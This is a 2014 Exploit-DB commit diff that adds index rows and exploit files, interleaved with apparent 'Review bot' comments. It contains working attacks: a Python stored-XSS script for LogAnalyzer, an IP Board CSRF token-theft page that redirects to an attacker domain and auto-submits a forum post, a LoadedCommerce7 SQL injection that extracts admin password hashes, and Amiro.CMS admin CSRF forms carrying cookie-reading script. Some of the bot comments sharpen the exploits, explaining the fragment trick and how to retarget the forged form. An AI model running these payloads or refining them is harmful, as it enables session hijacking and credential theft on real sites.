Updated 09_09_2014

This commit is contained in:
Offensive Security 2014-09-09 04:45:07 +00:00
parent 8d2f2b9c4b
commit d0930d2156
20 changed files with 1010 additions and 0 deletions


@ -30990,6 +30990,7 @@ id,file,description,date,author,platform,type,port
34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Include and Cross Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0
34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow Vulnerability",2010-07-22,demonalex,windows,dos,0
34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0
34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0
34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - CSRF Vulnerability",2014-08-25,"Rainer Giedat",multiple,webapps,80
34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager MetadataServlet.dat SQL Injection",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020
34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 'group.php' SQL Injection and HTML Injection Vulnerabilities",2010-08-05,skskilL,php,webapps,0
@ -31065,6 +31066,7 @@ id,file,description,date,author,platform,type,port
34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
34486,platforms/php/webapps/34486.txt,"PHPCMS2008 'download.php' Information Disclosure Vulnerability",2009-10-19,Securitylab.ir,php,webapps,0
34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0
34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)",2014-08-31,mr.pr0n,windows,local,0
34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0
34493,platforms/php/webapps/34493.txt,"PPScript 'shop.htm' SQL Injection Vulnerability",2009-08-03,MizoZ,php,webapps,0
34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
@ -31084,6 +31086,7 @@ id,file,description,date,author,platform,type,port
34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0
34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0
34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80
34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0
34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0
34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80
34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466
@ -31094,6 +31097,7 @@ id,file,description,date,author,platform,type,port
34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0
34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0
34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80
34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0
34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80
34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
@ -31104,6 +31108,7 @@ id,file,description,date,author,platform,type,port
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
@ -31117,3 +31122,17 @@ id,file,description,date,author,platform,type,port
34548,platforms/php/webapps/34548.txt,"Datemill photo_view.php return Parameter XSS",2009-09-10,Moudi,php,webapps,0
34549,platforms/php/webapps/34549.txt,"Datemill photo_search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
34550,platforms/php/webapps/34550.txt,"Datemill search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
34551,platforms/php/webapps/34551.txt,"IP Board 3.x - CSRF Token hjiacking",2014-09-07,"Piotr S.",php,webapps,0
34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory Vulnerability",2014-09-07,Breaking.Technology,php,webapps,0
34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability",2014-09-07,Att4ck3r.ir,php,webapps,0
34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - XSS",2014-09-07,"N0 Feel",php,webapps,0
34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0
34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0
34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0
34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 'CONFIG[AdminPath]' Parameter Remote File Include Vulnerability",2009-09-07,Securitylab.ir,php,webapps,0
34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 'index.php' Cross Site Scripting Vulnerability",2010-09-02,anT!-Tr0J4n,php,webapps,0
34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro 'c.php' SQL Injection Vulnerability",2010-09-02,MustLive,php,webapps,0
34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
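Review bot: Three descriptions in this index carry typos that hurt searchability: `OraclMySQL` on the 34510 row should be `Oracle MySQL` (the 34522 row spells it correctly), `Mulitple` on the 34511 row should be `Multiple`, and `hjiacking` on the 34551 row should be `hijacking` even though the advisory's own title repeats the misspelling. The 34552 row's description, `LoadedCommerce7 - Systemic Query Factory Vulnerability`, does not name the bug class; the advisory itself classifies it as SQL injection under CVE-2014-5140, so `LoadedCommerce7 - Systemic Query Factory SQL Injection (CVE-2014-5140)` would be more useful. Context rows are not marked on this rendered page, so which rows are new in each hunk can only be inferred from the files the commit adds.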



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42779/info
EncFS is prone to design errors in its cryptographic implementation.
Three flaws have been identified that contribute to a weakening of the protections provided under CBC/CFB cipher mode.
Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information.
http://www.exploit-db.com/sploits/34537.tar.gz
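Review bot: The entry is only a pointer to an external tarball, so a reader cannot tell from this file what the three CBC/CFB flaws are, which EncFS operations they affect, or whether a later release addresses them. Suggest one line per flaw and the fixed version, if known, above the download link, plus a SHA-256 of the tarball so its integrity can be checked after download. The version in the index row (`EncFS 1.6.0`) is not repeated in the file body; adding it would keep the file self-describing.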


@ -0,0 +1,51 @@
Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS
Author: Dolev Farhi
Contact: dolevf at yahoo dot com @dolevff
Application: LogAnalyzer 3.6.5
Date: 8.2.2014
Relevant CVEs: CVE-2014-6070
Vulnerable version: <= 3.6.5
Fixed version: 3.6.6
1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data.
It provides easy browsing, analysis of realtime network events and
reporting services.
2. Vulnerabilities Descriptions:
-----------------------------
It was found that an XSS injection is possible on a syslog server
running LogAnalyzer version 3.6.5.
by changing the hostname of any entity logging to syslog server with
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary
syslog message, a client-side script injection execution is possible.
4. proof of concept exploit
-----------------------
#!/usr/bin/python
# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection
# Date: Sept 2014
# CVE: 2014-6070
# Tested on RHEL6.4
import os
import syslog
hostname = os.uname()[1]
payload = "\"<script>alert('XSS');</script>\""
print("+ Setting temporary hostname to " + payload + "...")
os.system("hostname " + payload)
print("+ Injecting the syslog message...")
syslog.syslog("syslog xss injection")
print("+ Check LogAnalyzer dashboard...")
raw_input("+ Press [enter] to restore hostname...")
os.system("hostname " + "\"" + hostname + "\"")
print("+ Hostname restored to " + hostname)
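Review bot: The script ignores the result of `os.system("hostname " + payload)` and never restores the hostname if anything between the two `hostname` calls raises, so an unprivileged run logs the message under the real hostname while printing success, and an interrupted run leaves the machine named `"<script>alert('XSS');</script>"`. Checking the return code and wrapping the injection and prompt in try/finally fixes both, as below. The header also disagrees with itself: `Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS` versus `# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection`, `Date: 8.2.2014` versus `# Date: Sept 2014`, and the section numbering jumps from 2 to 4; `3.6.5` agrees with the `Fixed version: 3.6.6` line and should be used throughout. It would help testers to state that this changes a host-wide setting and that the payload also lands in every other consumer of this syslog stream.
```python
hostname = os.uname()[1]
payload = "\"<script>alert('XSS');</script>\""
print("+ Setting temporary hostname to " + payload + "...")
if os.system("hostname " + payload) != 0:
    raise SystemExit("+ could not change the hostname (root required?); nothing was logged")
try:
    print("+ Injecting the syslog message...")
    syslog.syslog("syslog xss injection")
    print("+ Check LogAnalyzer dashboard...")
    raw_input("+ Press [enter] to restore hostname...")
finally:
    os.system("hostname " + "\"" + hostname + "\"")
    print("+ Hostname restored to " + hostname)
```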

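--- a/platforms/php/webapps/34405.txt
+++ b/platforms/php/webapps/34405.txt
@@ -0,0 +1,19 @@
+?# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities
+in PHP Stock Management System 1.02
+# Date: 25 Aug 2014
+# Exploit Author: ?Ragha Deepthi K R
+# Vendor Homepage: ?http://www.posnic.com/?
+# Software Link:? http://sourceforge.net/projects/stockmanagement/
+# Version: ?1.02
+# Tested on: Windows 7
+#################################################
+?PHP Stock Management System 1.02? is vulnerable for ?multiple Persistent
+Cross Site Scripting Vulnerabilit?ies.
+The vulnerability affects 'sname'(Store Name Field), 'address'(Address
+Field), 'place'(Place Field), 'city'(City Field), pin(Pin Field),
+website(Website Field), email(Email Field) parameter?s? while updating the
+?store details in 'update_details.php' and when seen in 'view_report.php'
+#################################################
+Greetz :? Syam !?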
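Review bot: The file is littered with stray `?` characters where non-ASCII bytes (apparently zero-width or smart-quote characters) were mis-encoded, and they corrupt the vendor URL on the `# Vendor Homepage:` line (`?http://www.posnic.com/?`) and the version and title lines; they should be stripped so the header fields parse cleanly. The advisory names seven stored fields in `update_details.php` rendered by `view_report.php` but gives no request or payload, so a reader cannot reproduce or verify which of the seven actually reflect unescaped; one example POST with a marker value such as `<img src=x onerror=alert(1)>` in `sname` would make the finding checkable. Stating whether updating store details requires an authenticated account would also clarify the impact.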

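--- a/platforms/php/webapps/34551.txt
+++ b/platforms/php/webapps/34551.txt
@@ -0,0 +1,95 @@
+#Title: IP Board 3.x CSRF - Token hjiacking
+#Date: 03.09.14
+#Version: <= 3.4.6
+#Vendor: invisionpower.com
+#Author: Piotr S.
+#Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY
+1) Introduction
+Latest and propabbly previous IPB verions suffers on vulnerability, which allows attacker to steal CSRF token of specific user. Function, which allows users to share forum links, does not properly sanitize user input. Mentioned token is attached in request as GET parameter, so it's able to obtain it if user will be redirected to evil domain. Using the token, it is able to perform various operations as demonstrated in attached video.
+2) PoC
+Let's take a closer look at following url:
+http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ==
+At first glance you can notice b64 string, after decoding it, you may see following address:
+http://community.invisionpower.com/forum.php?id=2334
+In this case, user should be redirected to default domain of the forum - community.invisionpower.com; it is able to bypass protection in this redirect, by creating particular subdomain on attacker website. it needs to contain address of victim forum otherwise it won't work.
+Request:
+GET /index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS54b3JiLnBsL2V4cGxvaXQuaHRtbA== HTTP/1.1
+Host: community.invisionpower.com
+Response:
+302
+Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3
+Token is delivered as value of GET _k parameter. File to which user is redirected contains javascript, which grabs token that will be used in CSRF request.
+3) Reproduction
+a) Create subdomain
+http://forum.victim_site.com.your_domain.pl
+b) Then, create file exploit.html with this content:
+<html>
+<head>
+<script>
+onload = function ipboard(){var token = window.location.hash.split('=')[2];document.getElementById('tokens').value=token;};function fo(){document.ipboards.submit();}; setTimeout("fo()",1500);
+</script>
+</head>
+<body>
+<form action="http://a10089.try.invisionpower.com/index.php?" method="POST" id="ipboards" name="ipboards" enctype="multipart/form-data">
+<input type="hidden" name="TopicTitle" value="hacked!" />
+<input type="hidden" name="isRte" value="0" />
+<input type="hidden" name="noSmilies" value="0" />
+<input type="hidden" name="Post" value="IPboard 3.x 0day" />
+<input type="hidden" name="ipsTags" value="
+" />
+<input type="hidden" name="enableemo" value="yes" />
+<input type="hidden" name="enablesig" value="yes" />
+<input type="hidden" name="st" value="0" />
+<input type="hidden" name="app" value="forums" />
+<input type="hidden" name="module" value="post" />
+<input type="hidden" name="section" value="post" />
+<input type="hidden" name="do" value="new_post_do" />
+<input type="hidden" name="s" value="x" />
+<input type="hidden" name="p" value="0" />
+<input type="hidden" name="t" value="
+" />
+<input type="hidden" name="f" value="2" />
+<input type="hidden" name="parent_id" value="0" />
+<input type="hidden" name="attach_post_key" value="x" />
+<input type="hidden" id="tokens" name="auth_key" value="7xxx3e9" />
+<input type="hidden" name="removeattachid" value="0" />
+<input type="hidden" name="dosubmit" value="Post New Topic" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+<h1><b>IP Board 3.X PoC<br/>wait... ;)</b></h1>
+</body>
+</html>
+c) Create payload
+http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9zaXRlLmNvbS55b3VyX2RvbWFpbi5jb20vZXhwbG9pdC5odG1sIw==
+Now send this payload to victim - see video PoC for better understand.
+4) References
+- https://www.youtube.com/watch?v=G5P21TA4DjY
+- https://twitter.com/evil_xorb
+Happy hacking!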
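Review bot: The trick that makes the token reach `window.location.hash.split('=')[2]` is never explained: the base64 payload in step c decodes to a URL ending in `exploit.html#`, so when the forum appends `?forcePrint=1&_k=...` the token lands in the fragment rather than the query string, and a reader who omits the trailing `#` will get an empty token. A one-line comment in the `<script>` block, `// the payload URL ends in '#', so IPB's '?forcePrint=1&_k=...' is appended to the fragment and never leaves the browser`, would save that confusion. The form posts to `a10089.try.invisionpower.com` while the redirect and payload target `community.invisionpower.com`; the `action` and the `f` (forum id) value must both be set to the victim site or the stolen token is sent to the wrong host. Based on the statement that the attacker host only "needs to contain address of victim forum", the root cause looks like a prefix match on the redirect host; the fix on the vendor side is to require the decoded URL's host to equal the forum's host exactly and to never attach `_k` to an off-site redirect, which is worth stating so readers can assess patched versions.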

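--- a/platforms/php/webapps/34552.txt
+++ b/platforms/php/webapps/34552.txt
@@ -0,0 +1,35 @@
+Title: LoadedCommerce7 Systemic Query Factory Vulnerability
+Credits: Discovered by Breaking Technology Research Labs 2014-06-30
+Reference: CVE-2014-5140 - Assigned 31 June 2014
+Timeline:
+Vendor notified - 29 July 2014
+Vendor confirmed exploit 30 July 2014
+Severity: Critical
+Attack Complexity: Minimal
+Classification: SQL injection, unsafe string replacement
+Description:
+Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
+Proof of Concept:
+Have a valid customer account and create a new contact in your address book using the following values.
+First name: :entry_lastname,
+Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
+The new contact will be added to your address book with the admin hash as the contact's street address
+Suggested Fix:
+Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value. A similar fix was issued for tomatocart, available at
+https://github.com/tomatocart/TomatoCart-v1/pull/238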
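Review bot: The suggested fix of removing or encoding `:` treats the symptom; what the PoC demonstrates is that the query factory substitutes `:name` placeholders by string replacement in an order that lets an already-substituted value (`:entry_lastname,` in the first-name field) be replaced again with the attacker's last-name payload, and the durable fix is to bind values with real prepared statements (mysqli/PDO parameters) rather than textual placeholder replacement. That mechanism is also worth one sentence in the Description, since readers otherwise cannot see why the first-name value is a placeholder token rather than SQL. The timeline is inconsistent: `Assigned 31 June 2014` is not a real date, and a CVE assignment in June predates the `Vendor notified - 29 July 2014` entry; the dates should be checked. Stating that the PoC requires an authenticated customer account in the Attack Complexity field would make the severity claim easier to assess.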

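--- a/platforms/php/webapps/34553.txt
+++ b/platforms/php/webapps/34553.txt
@@ -0,0 +1,82 @@
+#################################################################################################
+#
+# Title : Wordpress Like Dislike Counter Plugin SQL
+Injection Vulnerability
+# Risk : High+/Critical
+# Exploit Author : XroGuE
+# Google Dork :
+inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
+AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php
+# Plugin Version : 1.2.3
+# Plugin Name : Like Dislike Counter
+# Plugin Download Link :
+http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
+# Vendor Home : www.wpfruits.com
+# Date : 2014/09/05
+# Tested in : Win7 - Linux
+#
+##################################################################################################
+# This Vulnerability Available in Both Version of This Plugin (Free &
+Pro Version).
+#
+# PoC :
+#
+#
+http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
+#
+# Vulnerable Page : ajax_counter.php
+#
+# if (!$changedDir)$changedDir =
+preg_replace('|wp-content.*$|','',__FILE__);
+# include_once($changedDir.'/wp-config.php');
+# if(isset($_COOKIE['ul_post_cnt']))
+# {
+# $posts_present=$_COOKIE['ul_post_cnt'];
+# }
+# else
+# {
+# $posts_present=array();
+# }
+# // Here ------------------------> Inputs Not Filtered ! :|
+# $post_id=$_POST['post_id'];
+# $up_type=$_POST['up_type'];
+# // Here <------------------------
+# if($up_type=='c_like'||$up_type=='c_dislike')
+# {
+# $for_com='c_';
+# }
+# else
+# {
+# $for_com='';
+# }
+# if(!in_array($for_com.$post_id,$posts_present))
+# {
+# update_post_ul_meta($post_id,$up_type);
+# }
+# echo get_post_ul_meta($post_id,$up_type);
+#
+##################################################################################################
+# POST
+wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
+HTTP/1.1
+# Host: localhost
+# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)
+Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21
+# Accept: */*
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+# X-Requested-With: XMLHttpRequest
+# Referer: http://localhost/wp/
+# Content-Length: 24
+# Connection: keep-alive
+# Pragma: no-cache
+# Cache-Control: no-cache
+# post_id=1&up_type=like
+##################################################################################################
+#
+# Founded By : XroGuE
+# Website : http://www.Att4ck3r.ir
+# E-Mail : info[at]att4ck3r[Dot]ir
+#
+##################################################################################################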
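Review bot: The PoC request ends with the benign body `post_id=1&up_type=like` and the excerpt stops at the calls to `update_post_ul_meta($post_id,$up_type)` and `get_post_ul_meta($post_id,$up_type)`, so the advisory shows that `$_POST` values are passed through unfiltered but never shows the query they reach or a payload that alters it; the SQL injection claim is asserted, not demonstrated. The excerpt of those two functions, plus one working injected `post_id` value, is needed for a reader to confirm the "High+/Critical" rating. Separately, `include_once($changedDir.'/wp-config.php')` means the endpoint is reached by requesting the plugin file directly, outside WordPress's admin-ajax nonce and capability checks, which should be stated as part of the finding. The natural fix is `$post_id = absint($_POST['post_id']);` plus an allow-list check of `$up_type` against the four expected strings, and `$wpdb->prepare()` inside the meta helpers.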

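--- a/platforms/php/webapps/34555.txt
+++ b/platforms/php/webapps/34555.txt
@@ -0,0 +1,18 @@
+# Exploit Title: [phponlinechat xss ]
+# Date: [5/9/2014]
+# Exploit Author: [N0 Feel]
+# Vendor Homepage: [http://phponlinechat.com/phpchat]
+# Software Link: [http://phponlinechat.com/chat-free-download.php]
+# Version: [3.0]
+# Tested on: [win7]
+php online chat suffer from xss in user panel
+- register as user
+- go to : http://path/phpchat/canned_opr.php
+- inject javascript evil code into messae filed
+demo :
+http://phponlinechat.com/phpchat/canned_opr.php
+have fun :)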
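Review bot: The reproduction step `inject javascript evil code into messae filed` names no parameter, gives no payload, and does not say whether the script executes for the submitting user only or for other operators who view the canned messages, so it cannot be classified as reflected or stored; `- submit <script>alert(1)</script> in the "message" field of canned_opr.php; it is rendered unescaped when the canned-message list is viewed` (adjusted to what was actually observed) would make it reproducible. `messae filed` should read `message field`. The `demo :` line points at the vendor's live installation; the advisory should direct readers to a local install instead of inviting tests against a third-party production host.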

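--- a/platforms/php/webapps/34558.txt
+++ b/platforms/php/webapps/34558.txt
@@ -0,0 +1,116 @@
+source: http://www.securityfocus.com/bid/42908/info
+Amiro.CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+Amiro.CMS 5.8.4.0 is vulnerable; other versions may also be affected.
+<form action="http://www.example.com/_admin/faq.php" method="post" name="main" >
+<input type="hidden" name="id" value="3" />
+<input type="hidden" name="action" value="apply" />
+<input type="hidden" name="action_original" value="apply" />
+<input type="hidden" name="_form_data" value="1" />
+<input type="hidden" name="email" value="" />
+<input type="hidden" name="cols" value="" />
+<input type="hidden" name="datefrom" value="31.12.1979" />
+<input type="hidden" name="enc_datefrom" value="31.12.1979" />
+<input type="hidden" name="dateto" value="31.12.2034" />
+<input type="hidden" name="enc_dateto" value="31.12.2034" />
+<input type="hidden" name="sort" value="answered" />
+<input type="hidden" name="enc_sort" value="answered" />
+<input type="hidden" name="sdim" value="asc" />
+<input type="hidden" name="enc_sdim" value="asc" />
+<input type="hidden" name="offset" value="0" />
+<input type="hidden" name="enc_offset" value="0" />
+<input type="hidden" name="limit" value="10" />
+<input type="hidden" name="enc_limit" value="10" />
+<input type="hidden" name="_grp_ids" value="" />
+<input type="hidden" name="enc__grp_ids" value="" />
+<input type="hidden" name="flt_subject_id" value="0" />
+<input type="hidden" name="enc_flt_subject_id" value="0" />
+<input type="hidden" name="flt_question" value="" />
+<input type="hidden" name="enc_flt_question" value="" />
+<input type="hidden" name="flt_urgent" value="0" />
+<input type="hidden" name="enc_flt_urgent" value="0" />
+<input type="hidden" name="public" value="checked" />
+<input type="hidden" name="publish" value="" />
+<input type="hidden" name="public" value="1" />
+<input type="hidden" name="date" value="11.08.2009" />
+<input type="hidden" name="cat_id" value="8" />
+<input type="hidden" name="catname" value="" />
+<input type="hidden" name="author" value="author name" />
+<input type="hidden" name="email" value="" />
+<input type="hidden" name="send" value="1" />
+<input type="hidden" name="sublink" value="faq-page-link" />
+<input type="hidden" name="original_sublink" value="faq-page-link" />
+<input type="hidden" name="html_title" value="html title" />
+<input type="hidden" name="original_html_title" value="html title" />
+<input type="hidden" name="html_keywords" value="key1" />
+<input type="hidden" name="original_html_keywords" value="key1" />
+<input type="hidden" name="is_keywords_manual" value="0" />
+<input type="hidden" name="html_description" value='descr"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="original_html_description" value="descr" />
+<input type="hidden" name="answer" value="answer text" />
+<input type="hidden" name="question" value="question text" />
+<input type="hidden" name="apply" value="OK" />
+</form>
+<script>
+document.main.submit();
+</script>
+<form action="http://www.example.com/_admin/news.php" method="post" name="main" enctype="multipart/form-data" >
+<input type="hidden" name="id" value="31" />
+<input type="hidden" name="action" value="apply" />
+<input type="hidden" name="action_original" value="apply" />
+<input type="hidden" name="_form_data" value="1" />
+<input type="hidden" name="datefrom" value="31.12.1979" />
+<input type="hidden" name="enc_datefrom" value="31.12.1979" />
+<input type="hidden" name="dateto" value="31.12.2034" />
+<input type="hidden" name="enc_dateto" value="31.12.2034" />
+<input type="hidden" name="sort" value="id" />
+<input type="hidden" name="enc_sort" value="id" />
+<input type="hidden" name="sdim" value="desc" />
+<input type="hidden" name="enc_sdim" value="desc" />
+<input type="hidden" name="offset" value="0" />
+<input type="hidden" name="enc_offset" value="0" />
+<input type="hidden" name="limit" value="10" />
+<input type="hidden" name="enc_limit" value="10" />
+<input type="hidden" name="_grp_ids" value="" />
+<input type="hidden" name="enc__grp_ids" value="" />
+<input type="hidden" name="flt_archive" value="0" />
+<input type="hidden" name="enc_flt_archive" value="0" />
+<input type="hidden" name="flt_header" value="" />
+<input type="hidden" name="enc_flt_header" value="" />
+<input type="hidden" name="flt_urgent" value="0" />
+<input type="hidden" name="enc_flt_urgent" value="0" />
+<input type="hidden" name="publish" value="" />
+<input type="hidden" name="arch" value="" />
+<input type="hidden" name="ltime" value="1281787153" />
+<input type="hidden" name="public" value="1" />
+<input type="hidden" name="date" value="28.08.2009" />
+<input type="hidden" name="time" value="13:40:07" />
+<input type="hidden" name="header" value="header" />
+<input type="hidden" name="srv_tags" value="tags" />
+<input type="hidden" name="sublink" value="newslink" />
+<input type="hidden" name="original_sublink" value="newslink" />
+<input type="hidden" name="html_title" value="title" />
+<input type="hidden" name="original_html_title" value="title" />
+<input type="hidden" name="html_keywords" value='keys"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="original_html_keywords" value="keys" />
+<input type="hidden" name="is_keywords_manual" value="0" />
+<input type="hidden" name="html_description" value="descr" />
+<input type="hidden" name="original_html_description" value="descr" />
+<input type="hidden" name="body" value="" />
+<input type="hidden" name="announce" value="announce" />
+<input type="hidden" name="apply" value="OK" />
+</form>
+<script>
+document.main.submit();
+</script>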
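Review bot: Both forms are named `main` and both are fired with `document.main.submit();`, so if the two PoCs are pasted into one HTML file `document.main` resolves to a collection of two forms and `.submit` is undefined, and neither request is sent; they are presumably meant as two separate pages, which the file should say, or the second form should be renamed (`name="main2"` with `document.main2.submit();`). Both targets live under `/_admin/`, so the injections only land if the victim holds an authenticated administrator session at the time the page is opened; that prerequisite, and the fact that this is therefore a CSRF-delivered stored injection into admin-edited metadata rather than an unauthenticated XSS, is missing from the description. The first form carries `public` twice (`value="checked"` and `value="1"`); in PHP the later value wins, so the first input is dead and could be dropped to avoid confusing readers.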

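--- a/platforms/php/webapps/34559.txt
+++ b/platforms/php/webapps/34559.txt
@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/42914/info
+Rumba XML is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+Rumba XML 2.4 is vulnerable; other versions may also be affected.
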